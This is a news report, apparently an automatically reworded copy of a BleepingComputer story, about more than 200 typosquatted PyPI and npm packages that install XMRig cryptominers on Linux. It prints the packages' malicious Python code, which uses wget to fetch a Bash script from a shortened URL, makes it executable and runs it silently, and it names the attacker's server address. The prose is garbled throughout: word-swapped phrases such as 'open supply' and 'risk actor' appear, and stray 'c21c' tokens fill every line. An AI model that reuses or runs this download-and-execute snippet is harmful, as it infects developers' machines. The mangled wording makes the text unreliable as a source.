c21c
c21c
c21c Greater than 200 malicious packages c21c have been found infiltrating the c21c PyPI and npm open supply c21c registries this week.
c21c
c21c These packages are largely typosquats c21c of extensively used libraries and c21c every certainly one of them downloads c21c a Bash script on Linux c21c programs that run cryptominers.
c21c
c21c PyPI, npm flooded with cryptomining c21c packages
c21c
c21c Researchers have caught at the c21c least 241 malicious npm and PyPI packages that drop c21c cryptominers after infecting Linux machines.
c21c
c21c These packages are typosquats of c21c well-liked open supply libraries and c21c instructions like c21c React c21c , c21c argparse c21c , and c21c AIOHTTP c21c , however as a substitute, obtain c21c and set up cryptomining Bash scripts c21c from the risk actor’s server.
c21c
c21c On Wednesday, software program developer c21c and researcher c21c Hauke Lübbers c21c shared coming throughout “ c21c at the least 33 initiatives c21c ” on PyPI that each c21c one launched c21c XMRig c21c , an open supply Monero c21c cryptominer, after infecting a system.
c21c
c21c
c21c Whereas the researcher was within c21c the means of reporting these c21c 33 malicious initiatives to PyPI admins, c21c he seen the risk actor started c21c publishing one other set of c21c twenty-two packages with the identical malicious payload.
c21c
c21c “After I reported them to c21c PyPI, they have been rapidly c21c deleted – however the malicious c21c actor was nonetheless within the c21c means of importing extra packages, c21c and uploaded one other 22,” Lübbers c21c tells BleepingComputer.
c21c
c21c “The packages focused Linux programs c21c and put in crypto mining c21c software program XMRig,” explains the c21c software program engineer.
c21c
c21c The Python packages include the c21c next piece of code that c21c downloads the Bash script from c21c the risk actor’s server by c21c way of Bit.ly URL shortener.
c21c
c21c os.system(“sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc c21c -L >/dev/null 2>&1″)
c21c os.system(“chmod +x .cmc >/dev/null 2>&1”)
c21c os.system(“./.cmc >/dev/null 2>&1”)
c21c
c21c The researcher explains the Bit[.]ly c21c URL redirects to the script hosted c21c on 80.78.25[.]140:8000.
c21c
c21c “This was achieved by downloading c21c and executing the Bash script c21c from c21c http://80.78.25[.]140:8000/.cmc”
c21c
c21c Upon execution, the script notifies the risk c21c actor of the IP tackle c21c of the compromised host and c21c if the deployment of cryptominers c21c succeeded.
c21c
c21c On the time of writing, c21c we noticed the IP tackle was c21c down. However, BleepingComputer was in c21c a position to acquire a c21c duplicate of the script and c21c we’re in a position to affirm c21c the researcher’s claims:
c21c
c21c
c21c The Sonatype safety analysis crew c21c that I am part of, c21c c21c disclosed c21c one other c21c 186 npm typosquatting packages c21c at this time making contact c21c with the identical URL to c21c obtain the malicious Bash script.
c21c
c21c
c21c It seems that each registries cleared the c21c typosquats pretty rapidly from their c21c platforms earlier than these may c21c do extra hurt to builders.
c21c
c21c Regardless of numerous safety enhancements, c21c like c21c mandating two-factor authentication for vital c21c initiatives c21c and introducing new options c21c (like Python’s c21c setuptools transferring in direction of c21c changing setup.py c21c ), it appears the open c21c supply repository’s race towards risk c21c actors is just getting much c21c more difficult.
c21c
c21c Final week, software program safety c21c firm Checkmarx reported discovering a dozen malicious c21c Python packages c21c performing DDoS assaults on Counter-Strike servers c21c .
c21c
c21c Earlier this month, cybersecurity agency c21c CheckPoint c21c outed 10 malicious PyPI packages c21c caught stealing developer credentials.
c21c
c21c In July, ReversingLabs researchers disclosed c21c a provide chain assault dubbed c21c IconBurst c21c that when once more, exploited c21c typosquatting to contaminate builders.
c21c
c21c